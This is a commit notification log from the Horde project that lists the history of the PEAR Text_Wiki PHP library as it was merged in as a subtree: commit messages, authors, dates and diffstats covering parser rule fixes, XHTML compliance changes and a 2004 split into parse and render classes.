438cd53 Don't strip the leading linebreak off blockquotes.
b0d63cb1 Fix test.
301610e Fix tests.
02c4dd5 [jan] Fix time offsets when importing CSV data with two-digit years.
12c00f8 Prepare for adding a subtree.
9460590 Squashed 'wicked/lib/Text_Wiki/' content from commit 301610e
68ece8f Merge commit '9460590060bdc10d6e7f02ca44b2dc586e236504' as 'wicked/lib/Text_Wiki'
d6e5e53 Re-merge Horde customizations and extensions.
2b7fa54 Remove PHP 4 constructors.
85b8baf Merge commit '2b7fa546469029009782bcab89c41c9c108f2da6'
a103e17 Use PHP 5 constructors in our own parsers too.
7a28549 Load the bundled Text_Wiki.
3c15568 Removed too much.

Summary: http://github.com/horde/horde/compare/7748bafdb9281b5c6ff2ec994614564fc48e3362...3c1556861e7cb7f86429a1807940b89d8cf0bdfb

-----------------------------------------------------------------------

commit a57ed3f2f88d095ecc66027692298907cad95b4b
Author: Gwynne Raskind 
Date:   Sun Apr 25 16:14:02 2004 +0000

    Standard project directories initialized by cvs2svn.
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 157085 c90b9560-bf6c-de11-be94-00142212c4b1

http://github.com/horde/horde/commit/a57ed3f2f88d095ecc66027692298907cad95b4b

-----------------------------------------------------------------------

commit 66233b62ef0c9e0cf2ef47f37552a132fa80e659
Author: Paul M Jones 
Date:   Sun Apr 25 16:14:02 2004 +0000

    initial add to PEAR
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 157086 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                  | 819 +++++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Rule.php             | 345 +++++++++++++++++
 Text/Wiki/Rule/blockquote.php  | 203 ++++++++++
 Text/Wiki/Rule/bold.php        | 103 ++++++
 Text/Wiki/Rule/center.php      |  98 +++++
 Text/Wiki/Rule/code.php        | 104 ++++++
 Text/Wiki/Rule/colortext.php   | 139 +++++++
 Text/Wiki/Rule/deflist.php     | 172 +++++++++
 Text/Wiki/Rule/delimiter.php   |  95 +++++
 Text/Wiki/Rule/embed.php       | 102 +++++
 Text/Wiki/Rule/emphasis.php    | 103 ++++++
 Text/Wiki/Rule/entities.php    |  57 +++
 Text/Wiki/Rule/freelink.php    | 161 ++++++++
 Text/Wiki/Rule/heading.php     | 119 ++++++
 Text/Wiki/Rule/horiz.php       |  88 +++++
 Text/Wiki/Rule/html.php        |  93 +++++
 Text/Wiki/Rule/image.php       | 136 +++++++
 Text/Wiki/Rule/include.php     |  80 ++++
 Text/Wiki/Rule/interwiki.php   | 179 +++++++++
 Text/Wiki/Rule/italic.php      | 103 ++++++
 Text/Wiki/Rule/list.php        | 285 ++++++++++++++
 Text/Wiki/Rule/newline.php     |  90 +++++
 Text/Wiki/Rule/paragraph.php   | 147 ++++++++
 Text/Wiki/Rule/phpcode.php     | 119 ++++++
 Text/Wiki/Rule/phplookup.php   |  93 +++++
 Text/Wiki/Rule/prefilter.php   |  70 ++++
 Text/Wiki/Rule/raw.php         |  91 +++++
 Text/Wiki/Rule/revise.php      | 182 +++++++++
 Text/Wiki/Rule/strong.php      | 103 ++++++
 Text/Wiki/Rule/superscript.php | 103 ++++++
 Text/Wiki/Rule/table.php       | 249 +++++++++++++
 Text/Wiki/Rule/tighten.php     |  50 +++
 Text/Wiki/Rule/toc.php         | 352 ++++++++++++++++++
 Text/Wiki/Rule/tt.php          | 102 +++++
 Text/Wiki/Rule/url.php         | 308 ++++++++++++++++
 Text/Wiki/Rule/wikilink.php    | 215 +++++++++++
 package.xml                    |  72 ++++
 37 files changed, 5930 insertions(+)
 create mode 100644 Text/Wiki.php
 create mode 100644 Text/Wiki/Rule.php
 create mode 100644 Text/Wiki/Rule/blockquote.php
 create mode 100644 Text/Wiki/Rule/bold.php
 create mode 100755 Text/Wiki/Rule/center.php
 create mode 100755 Text/Wiki/Rule/code.php
 create mode 100755 Text/Wiki/Rule/colortext.php
 create mode 100644 Text/Wiki/Rule/deflist.php
 create mode 100644 Text/Wiki/Rule/delimiter.php
 create mode 100755 Text/Wiki/Rule/embed.php
 create mode 100644 Text/Wiki/Rule/emphasis.php
 create mode 100644 Text/Wiki/Rule/entities.php
 create mode 100755 Text/Wiki/Rule/freelink.php
 create mode 100644 Text/Wiki/Rule/heading.php
 create mode 100644 Text/Wiki/Rule/horiz.php
 create mode 100755 Text/Wiki/Rule/html.php
 create mode 100755 Text/Wiki/Rule/image.php
 create mode 100755 Text/Wiki/Rule/include.php
 create mode 100644 Text/Wiki/Rule/interwiki.php
 create mode 100644 Text/Wiki/Rule/italic.php
 create mode 100644 Text/Wiki/Rule/list.php
 create mode 100644 Text/Wiki/Rule/newline.php
 create mode 100755 Text/Wiki/Rule/paragraph.php
 create mode 100755 Text/Wiki/Rule/phpcode.php
 create mode 100755 Text/Wiki/Rule/phplookup.php
 create mode 100644 Text/Wiki/Rule/prefilter.php
 create mode 100644 Text/Wiki/Rule/raw.php
 create mode 100755 Text/Wiki/Rule/revise.php
 create mode 100644 Text/Wiki/Rule/strong.php
 create mode 100644 Text/Wiki/Rule/superscript.php
 create mode 100644 Text/Wiki/Rule/table.php
 create mode 100644 Text/Wiki/Rule/tighten.php
 create mode 100755 Text/Wiki/Rule/toc.php
 create mode 100644 Text/Wiki/Rule/tt.php
 create mode 100644 Text/Wiki/Rule/url.php
 create mode 100755 Text/Wiki/Rule/wikilink.php
 create mode 100644 package.xml

http://github.com/horde/horde/commit/66233b62ef0c9e0cf2ef47f37552a132fa80e659

-----------------------------------------------------------------------

commit 72faf536aa10b5eb88da1d1768b0426bdec02213
Author: Paul M Jones 
Date:   Sun May 2 13:13:16 2004 +0000

    somehow, an earlier version of Text_Wiki was added to PEAR CVS; this commit reflects the 0.14 version, which should have been imported in the first place.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 157782 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                 | 59 ++++++++++++++++++----------
 Text/Wiki/Rule/blockquote.php | 12 ++++--
 Text/Wiki/Rule/break.php      | 90 +++++++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Rule/deflist.php    |  2 +-
 Text/Wiki/Rule/heading.php    |  2 +-
 Text/Wiki/Rule/list.php       |  2 +-
 Text/Wiki/Rule/newline.php    |  9 +++--
 Text/Wiki/Rule/paragraph.php  | 10 +----
 Text/Wiki/Rule/prefilter.php  |  7 ++++
 Text/Wiki/Rule/table.php      |  2 +-
 Text/Wiki/Rule/tighten.php    |  6 +--
 package.xml                   | 19 ++++-----
 12 files changed, 168 insertions(+), 52 deletions(-)
 create mode 100755 Text/Wiki/Rule/break.php

http://github.com/horde/horde/commit/72faf536aa10b5eb88da1d1768b0426bdec02213

-----------------------------------------------------------------------

commit 50040f76a03ba3bb6bc6c2b1df6bcdbb6989b9a9
Author: Paul M Jones 
Date:   Sun May 2 23:15:25 2004 +0000

    updated to reflect 0.15 release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 157810 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 26 ++++++++++++++++++--------
 1 file changed, 18 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/50040f76a03ba3bb6bc6c2b1df6bcdbb6989b9a9

-----------------------------------------------------------------------

commit 528c3fa709ee214bddf9cf95064325adc1a5fbb2
Author: Paul M Jones 
Date:   Sun May 2 23:16:46 2004 +0000

    udpated with changes for 0.15:
    
    * sprintf() notatation for wikilink rule config new_url and edit_url now supported, per reuqest from Alan Knowles
    * sprintf() notatation for interwiki rule config site URLs now supported, per request from Alan Knowled
    * URL rule config now supports alternative targets, per request from Tobias Schlitt
    * interwiki rule config now supports alternative targets
    * freelink rule patched by Tobias Schlitt for proper knowledge of which pages exist in the wiki
    * freelink rule added back into the default rule set
    * XHTML compliance: "a" tags in toc should use "id", not name, per note from Aaron Kalin
    * XHTML compliance: list rule generates now generates valid XHTML lists, per note Aaron Kalin
    * XHTML compliance: "pre" tags not allowed within "p" tags, fixed per note from Aaron Kalin
    * XHTML compliance: PHP highlighting fixed per note from Aaron Kalin, email dated Apr 6, 2004done
    * code rule now supports 'type="php" to convert PHP code (identical to phpcode rule), can support 'type="html"' and other types in future
    * "bold" rule is deprecated, use "strong" instead
    * "italic" rule is deprecated, use "emphasis" instead
    * "phpcode" rule is deprated, use "code" instead with 'type="php"'
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 157811 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                |  35 ++-
 Text/Wiki/Rule/code.php      | 101 ++++++--
 Text/Wiki/Rule/freelink.php  |  26 ++-
 Text/Wiki/Rule/interwiki.php |  28 ++-
 Text/Wiki/Rule/list.php      |  20 +-
 Text/Wiki/Rule/phpcode.php   |  18 +-
 Text/Wiki/Rule/toc.php       | 532 +++++++++++++++++++++----------------------
 Text/Wiki/Rule/url.php       |  12 +-
 Text/Wiki/Rule/wikilink.php  |  34 ++-
 9 files changed, 495 insertions(+), 311 deletions(-)

http://github.com/horde/horde/commit/528c3fa709ee214bddf9cf95064325adc1a5fbb2

-----------------------------------------------------------------------

commit aebfc66281129087997724ded4f8882c7f52555d
Author: Paul M Jones 
Date:   Sun May 2 23:18:01 2004 +0000

    removed extra lines for nonexistent files
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 157812 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 7 +------
 1 file changed, 1 insertion(+), 6 deletions(-)

http://github.com/horde/horde/commit/aebfc66281129087997724ded4f8882c7f52555d

-----------------------------------------------------------------------

commit 207a2279c29a0570fc429b29da290c5e4bcb6530
Author: Paul M Jones 
Date:   Fri May 21 21:11:59 2004 +0000

    removed trim() from line 106 to leave leading and trailing white space in place in the output
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159324 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/code.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/207a2279c29a0570fc429b29da290c5e4bcb6530

-----------------------------------------------------------------------

commit a740cc4978520d4a1283ac9bb5845c6697301d62
Author: Paul M Jones 
Date:   Fri May 21 21:14:47 2004 +0000

    started new release, not sure if it will be 0.15.1 or 0.16.  Noted "code" rule change about white space.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159325 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 22 ++++------------------
 1 file changed, 4 insertions(+), 18 deletions(-)

http://github.com/horde/horde/commit/a740cc4978520d4a1283ac9bb5845c6697301d62

-----------------------------------------------------------------------

commit fd9efd99d8f451216309f8c981452e612c81fd2a
Author: Paul M Jones 
Date:   Fri May 21 21:35:48 2004 +0000

    no longer need to smash list items together on sequential lines. you can have any number of blank newlines between list items and stay in the same list.  this improves source readability.  however, if you start a line with a non-* non-# character non-whitespace character, that counts as a new paragraph.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159327 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/list.php | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/fd9efd99d8f451216309f8c981452e612c81fd2a

-----------------------------------------------------------------------

commit 266f3089ab7ccbfe09d16493d0b06309858f93e7
Author: Paul M Jones 
Date:   Fri May 21 23:00:33 2004 +0000

    now can separate list items with newlines and you stay in the same list
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159338 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/deflist.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/266f3089ab7ccbfe09d16493d0b06309858f93e7

-----------------------------------------------------------------------

commit ef3f268440b4c19ce9d640654146d9ea9bbad06f
Author: Paul M Jones 
Date:   Fri May 21 23:06:48 2004 +0000

    added extra newline to returned text so as not so screw up paragraphs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159341 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/list.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/ef3f268440b4c19ce9d640654146d9ea9bbad06f

-----------------------------------------------------------------------

commit a79cd6d065ef69671aad3226b0ce719c10803f0b
Author: Paul M Jones 
Date:   Sat May 22 15:10:35 2004 +0000

    fixed bug 1362, accented letters not translated to HTML entities.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159386 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/entities.php | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/a79cd6d065ef69671aad3226b0ce719c10803f0b

-----------------------------------------------------------------------

commit 44d77a1a3c0f0d84e7e1b384ac4d0b9b54f60511
Author: Paul M Jones 
Date:   Sat May 22 15:16:59 2004 +0000

    fixed bug 1384, list rule inaccurate.  Have implemented the "display: inline" style fix noted by Mike.  Not really happy with this for the long term, but it will do for now.  In future, will attempt to rewrite the "list" rule to be more semantically accurate.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159387 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/list.php | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/44d77a1a3c0f0d84e7e1b384ac4d0b9b54f60511

-----------------------------------------------------------------------

commit e81dfa1f8dfd83c1bcee7db2507c2beb8ffe8162
Author: Paul M Jones 
Date:   Sat May 22 15:21:22 2004 +0000

    process() returns two newlines after the table, not just one, to help with parsing paragraph breaks
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159389 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/table.php | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/e81dfa1f8dfd83c1bcee7db2507c2beb8ffe8162

-----------------------------------------------------------------------

commit b1cf83d9e74a0bc2e35eb981a4065959e2e24663
Author: Paul M Jones 
Date:   Sat May 22 17:16:37 2004 +0000

    can now set rule conf key 'images' to turn image processing on and off (defaults to true/on)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159401 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/url.php | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/b1cf83d9e74a0bc2e35eb981a4065959e2e24663

-----------------------------------------------------------------------

commit 9c41f41ffd347b9fd64cac01b1908af7fd9a1727
Author: Paul M Jones 
Date:   Sat May 22 20:29:38 2004 +0000

    added renderPlain() stub method
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159405 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule.php | 32 +++++++++++++++++++++++++++++++-
 1 file changed, 31 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/9c41f41ffd347b9fd64cac01b1908af7fd9a1727

-----------------------------------------------------------------------

commit ed2cf848365678ac5f71e75e2a32f9740b7c2e63
Author: Paul M Jones 
Date:   Sat May 22 20:33:09 2004 +0000

    updated comments, brought package.xml up to 0.16, added renderPlain() methods, added newlines tailing deflist and table. updated comments.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159406 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php                |  7 ++++---
 Text/Wiki/Rule/break.php     | 19 +++++++++++++++++++
 Text/Wiki/Rule/deflist.php   |  2 +-
 Text/Wiki/Rule/newline.php   | 19 +++++++++++++++++++
 Text/Wiki/Rule/paragraph.php | 19 +++++++++++++++++++
 Text/Wiki/Rule/wikilink.php  |  2 +-
 package.xml                  | 12 +++++++++---
 7 files changed, 72 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/ed2cf848365678ac5f71e75e2a32f9740b7c2e63

-----------------------------------------------------------------------

commit 2edb84b90e1f9c3a59d4f57ba366e2361aa29e7d
Author: Paul M Jones 
Date:   Tue May 25 01:16:31 2004 +0000

    added getConf() method to safely access config key values
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159568 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule.php | 34 +++++++++++++++++++++++++++++++---
 1 file changed, 31 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/2edb84b90e1f9c3a59d4f57ba366e2361aa29e7d

-----------------------------------------------------------------------

commit c80dea5664fbb11590afc115e1ca250c77c43b39
Author: Paul M Jones 
Date:   Tue May 25 01:17:27 2004 +0000

    added conf key 'numbers' (set to true if you want to allow numbers as lower-case letters in the regex).  also added number-based regex as an alternate when 'numbers' is true.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159569 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/wikilink.php | 51 ++++++++++++++++++++++++++++++++-------------
 1 file changed, 37 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/c80dea5664fbb11590afc115e1ca250c77c43b39

-----------------------------------------------------------------------

commit 433b0243cf922bb379c98a9a05f5d37f036d9f80
Author: Paul M Jones 
Date:   Tue May 25 01:18:17 2004 +0000

    added "'numbers' => false" in the wikilink conf array; it's false by default to maintain previous behavior.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159570 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/433b0243cf922bb379c98a9a05f5d37f036d9f80

-----------------------------------------------------------------------

commit dbf1ff3492b014f74dc387b6ff1b32cf8a645e8f
Author: Paul M Jones 
Date:   Tue May 25 01:29:06 2004 +0000

    added newline before and after returned text to help with paragraph parsing
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159573 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule/blockquote.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/dbf1ff3492b014f74dc387b6ff1b32cf8a645e8f

-----------------------------------------------------------------------

commit 399632108514f409e476295804b812a56d7a2c69
Author: Paul M Jones 
Date:   Tue May 25 21:38:02 2004 +0000

    udpated with proper date
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159674 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 15 +++++----------
 1 file changed, 5 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/399632108514f409e476295804b812a56d7a2c69

-----------------------------------------------------------------------

commit 5ec01bf6b434d8305f1d71284e5e2517859be42b
Author: Paul M Jones 
Date:   Tue May 25 21:38:47 2004 +0000

    updated version number to 0.17
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 159675 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/5ec01bf6b434d8305f1d71284e5e2517859be42b

-----------------------------------------------------------------------

commit c38d93fab9529c2fcaed3af9d73c79f18a70680a
Author: Paul M Jones 
Date:   Sun Jun 6 15:36:33 2004 +0000

    removing files in preparation for MAJOR RESTRUCTURING of the directories
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 160657 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Rule.php             | 403 -----------------------------------------
 Text/Wiki/Rule/blockquote.php  | 209 ---------------------
 Text/Wiki/Rule/bold.php        | 103 -----------
 Text/Wiki/Rule/break.php       | 109 -----------
 Text/Wiki/Rule/center.php      |  98 ----------
 Text/Wiki/Rule/code.php        | 176 ------------------
 Text/Wiki/Rule/colortext.php   | 139 --------------
 Text/Wiki/Rule/deflist.php     | 172 ------------------
 Text/Wiki/Rule/delimiter.php   |  95 ----------
 Text/Wiki/Rule/embed.php       | 102 -----------
 Text/Wiki/Rule/emphasis.php    | 103 -----------
 Text/Wiki/Rule/entities.php    |  57 ------
 Text/Wiki/Rule/freelink.php    | 179 ------------------
 Text/Wiki/Rule/heading.php     | 119 ------------
 Text/Wiki/Rule/horiz.php       |  88 ---------
 Text/Wiki/Rule/html.php        |  93 ----------
 Text/Wiki/Rule/image.php       | 136 --------------
 Text/Wiki/Rule/include.php     |  80 --------
 Text/Wiki/Rule/interwiki.php   | 195 --------------------
 Text/Wiki/Rule/italic.php      | 103 -----------
 Text/Wiki/Rule/list.php        | 298 ------------------------------
 Text/Wiki/Rule/newline.php     | 110 -----------
 Text/Wiki/Rule/paragraph.php   | 160 ----------------
 Text/Wiki/Rule/phpcode.php     | 133 --------------
 Text/Wiki/Rule/phplookup.php   |  93 ----------
 Text/Wiki/Rule/prefilter.php   |  77 --------
 Text/Wiki/Rule/raw.php         |  91 ----------
 Text/Wiki/Rule/revise.php      | 182 -------------------
 Text/Wiki/Rule/strong.php      | 103 -----------
 Text/Wiki/Rule/superscript.php | 103 -----------
 Text/Wiki/Rule/table.php       | 249 -------------------------
 Text/Wiki/Rule/tighten.php     |  50 -----
 Text/Wiki/Rule/toc.php         | 352 -----------------------------------
 Text/Wiki/Rule/tt.php          | 102 -----------
 Text/Wiki/Rule/url.php         | 317 --------------------------------
 Text/Wiki/Rule/wikilink.php    | 264 ---------------------------
 36 files changed, 5443 deletions(-)
 delete mode 100644 Text/Wiki/Rule.php
 delete mode 100644 Text/Wiki/Rule/blockquote.php
 delete mode 100644 Text/Wiki/Rule/bold.php
 delete mode 100755 Text/Wiki/Rule/break.php
 delete mode 100755 Text/Wiki/Rule/center.php
 delete mode 100755 Text/Wiki/Rule/code.php
 delete mode 100755 Text/Wiki/Rule/colortext.php
 delete mode 100644 Text/Wiki/Rule/deflist.php
 delete mode 100644 Text/Wiki/Rule/delimiter.php
 delete mode 100755 Text/Wiki/Rule/embed.php
 delete mode 100644 Text/Wiki/Rule/emphasis.php
 delete mode 100644 Text/Wiki/Rule/entities.php
 delete mode 100755 Text/Wiki/Rule/freelink.php
 delete mode 100644 Text/Wiki/Rule/heading.php
 delete mode 100644 Text/Wiki/Rule/horiz.php
 delete mode 100755 Text/Wiki/Rule/html.php
 delete mode 100755 Text/Wiki/Rule/image.php
 delete mode 100755 Text/Wiki/Rule/include.php
 delete mode 100644 Text/Wiki/Rule/interwiki.php
 delete mode 100644 Text/Wiki/Rule/italic.php
 delete mode 100644 Text/Wiki/Rule/list.php
 delete mode 100644 Text/Wiki/Rule/newline.php
 delete mode 100755 Text/Wiki/Rule/paragraph.php
 delete mode 100755 Text/Wiki/Rule/phpcode.php
 delete mode 100755 Text/Wiki/Rule/phplookup.php
 delete mode 100644 Text/Wiki/Rule/prefilter.php
 delete mode 100644 Text/Wiki/Rule/raw.php
 delete mode 100755 Text/Wiki/Rule/revise.php
 delete mode 100644 Text/Wiki/Rule/strong.php
 delete mode 100644 Text/Wiki/Rule/superscript.php
 delete mode 100644 Text/Wiki/Rule/table.php
 delete mode 100644 Text/Wiki/Rule/tighten.php
 delete mode 100755 Text/Wiki/Rule/toc.php
 delete mode 100644 Text/Wiki/Rule/tt.php
 delete mode 100644 Text/Wiki/Rule/url.php
 delete mode 100755 Text/Wiki/Rule/wikilink.php

http://github.com/horde/horde/commit/c38d93fab9529c2fcaed3af9d73c79f18a70680a

-----------------------------------------------------------------------

commit 241808f7ef9f279bfb2fb7977175a96787aa5792
Author: Paul M Jones 
Date:   Sun Jun 6 15:44:35 2004 +0000

    Major restructuring of all Text_Wiki parsing and rendering rules is reflected by the addition of theses files.
    
    Of note:
    
    * Rules are now split up: one class for parse, another class for each render-format
    * Formats themselves (XHTML, DocBook, Plain, etc) have their own class and get their own pre- and post-render methods
    * Instead of set/getRuleConf(), mostly use set/getRenderConf() instead
    * Wikilinks parser uses numbers as lower-case letters
    * List parser has better token type names
    * Xhtml List renders with proper semantics for nested lists (per notes from Michael Wallner and others)
    * Xhtml List and Table renderers apply CSS classes now instead of inline attributes
    * Renamed all Entities rules to Translatehtml (more accurately descriptive)
    * In Translatehtml parser, added conf option for translation table type (HTML_ENTITIES, HTML_SPECIALCHARS, etc) -- helps with i18n
    * In abstract parser, renamed getOptions() to getAttrs() (more accurately descriptive for parsing markup attributes)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 160658 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse.php                      | 253 +++++++++++++++++++++++++++++
 Text/Wiki/Parse/Blockquote.php           | 163 +++++++++++++++++++
 Text/Wiki/Parse/Bold.php                 |  61 +++++++
 Text/Wiki/Parse/Break.php                |  54 +++++++
 Text/Wiki/Parse/Center.php               |  60 +++++++
 Text/Wiki/Parse/Code.php                 |  72 +++++++++
 Text/Wiki/Parse/Colortext.php            |  74 +++++++++
 Text/Wiki/Parse/Deflist.php              | 104 ++++++++++++
 Text/Wiki/Parse/Delimiter.php            |  62 ++++++++
 Text/Wiki/Parse/Embed.php                |  68 ++++++++
 Text/Wiki/Parse/Emphasis.php             |  67 ++++++++
 Text/Wiki/Parse/Freelink.php             | 111 +++++++++++++
 Text/Wiki/Parse/Heading.php              |  76 +++++++++
 Text/Wiki/Parse/Horiz.php                |  52 ++++++
 Text/Wiki/Parse/Html.php                 |  57 +++++++
 Text/Wiki/Parse/Image.php                |  76 +++++++++
 Text/Wiki/Parse/Include.php              |  68 ++++++++
 Text/Wiki/Parse/Interwiki.php            | 120 ++++++++++++++
 Text/Wiki/Parse/Italic.php               |  67 ++++++++
 Text/Wiki/Parse/List.php                 | 230 +++++++++++++++++++++++++++
 Text/Wiki/Parse/Newline.php              |  57 +++++++
 Text/Wiki/Parse/Paragraph.php            | 128 +++++++++++++++
 Text/Wiki/Parse/Phplookup.php            |  58 +++++++
 Text/Wiki/Parse/Prefilter.php            |  62 ++++++++
 Text/Wiki/Parse/Raw.php                  |  55 +++++++
 Text/Wiki/Parse/Revise.php               | 130 +++++++++++++++
 Text/Wiki/Parse/Strong.php               |  67 ++++++++
 Text/Wiki/Parse/Superscript.php          |  67 ++++++++
 Text/Wiki/Parse/Table.php                | 177 +++++++++++++++++++++
 Text/Wiki/Parse/Tighten.php              |  32 ++++
 Text/Wiki/Parse/Toc.php                  | 241 ++++++++++++++++++++++++++++
 Text/Wiki/Parse/Translatehtml.php        |  47 ++++++
 Text/Wiki/Parse/Tt.php                   |  69 ++++++++
 Text/Wiki/Parse/Url.php                  | 265 +++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Wikilink.php             | 158 ++++++++++++++++++
 Text/Wiki/Render.php                     | 141 ++++++++++++++++
 Text/Wiki/Render/Xhtml.php               |  16 ++
 Text/Wiki/Render/Xhtml/Blockquote.php    |  47 ++++++
 Text/Wiki/Render/Xhtml/Bold.php          |  29 ++++
 Text/Wiki/Render/Xhtml/Break.php         |  24 +++
 Text/Wiki/Render/Xhtml/Center.php        |  31 ++++
 Text/Wiki/Render/Xhtml/Code.php          |  92 +++++++++++
 Text/Wiki/Render/Xhtml/Colortext.php     |  56 +++++++
 Text/Wiki/Render/Xhtml/Deflist.php       |  91 +++++++++++
 Text/Wiki/Render/Xhtml/Delimiter.php     |  23 +++
 Text/Wiki/Render/Xhtml/Embed.php         |  28 ++++
 Text/Wiki/Render/Xhtml/Emphasis.php      |  29 ++++
 Text/Wiki/Render/Xhtml/Freelink.php      |  61 +++++++
 Text/Wiki/Render/Xhtml/Heading.php       |  19 +++
 Text/Wiki/Render/Xhtml/Horiz.php         |  23 +++
 Text/Wiki/Render/Xhtml/Html.php          |  24 +++
 Text/Wiki/Render/Xhtml/Image.php         |  52 ++++++
 Text/Wiki/Render/Xhtml/Include.php       |   8 +
 Text/Wiki/Render/Xhtml/Interwiki.php     |  60 +++++++
 Text/Wiki/Render/Xhtml/Italic.php        |  29 ++++
 Text/Wiki/Render/Xhtml/List.php          | 156 ++++++++++++++++++
 Text/Wiki/Render/Xhtml/Newline.php       |  12 ++
 Text/Wiki/Render/Xhtml/Paragraph.php     |  31 ++++
 Text/Wiki/Render/Xhtml/Phplookup.php     |  32 ++++
 Text/Wiki/Render/Xhtml/Prefilter.php     |  40 +++++
 Text/Wiki/Render/Xhtml/Raw.php           |  23 +++
 Text/Wiki/Render/Xhtml/Revise.php        |  38 +++++
 Text/Wiki/Render/Xhtml/Strong.php        |  30 ++++
 Text/Wiki/Render/Xhtml/Superscript.php   |  29 ++++
 Text/Wiki/Render/Xhtml/Table.php         | 103 ++++++++++++
 Text/Wiki/Render/Xhtml/Tighten.php       |  10 ++
 Text/Wiki/Render/Xhtml/Toc.php           |  64 ++++++++
 Text/Wiki/Render/Xhtml/Translatehtml.php |   9 ++
 Text/Wiki/Render/Xhtml/Tt.php            |  30 ++++
 Text/Wiki/Render/Xhtml/Url.php           |  69 ++++++++
 Text/Wiki/Render/Xhtml/Wikilink.php      |  76 +++++++++
 71 files changed, 5143 insertions(+)
 create mode 100755 Text/Wiki/Parse.php
 create mode 100755 Text/Wiki/Parse/Blockquote.php
 create mode 100755 Text/Wiki/Parse/Bold.php
 create mode 100755 Text/Wiki/Parse/Break.php
 create mode 100755 Text/Wiki/Parse/Center.php
 create mode 100755 Text/Wiki/Parse/Code.php
 create mode 100755 Text/Wiki/Parse/Colortext.php
 create mode 100755 Text/Wiki/Parse/Deflist.php
 create mode 100755 Text/Wiki/Parse/Delimiter.php
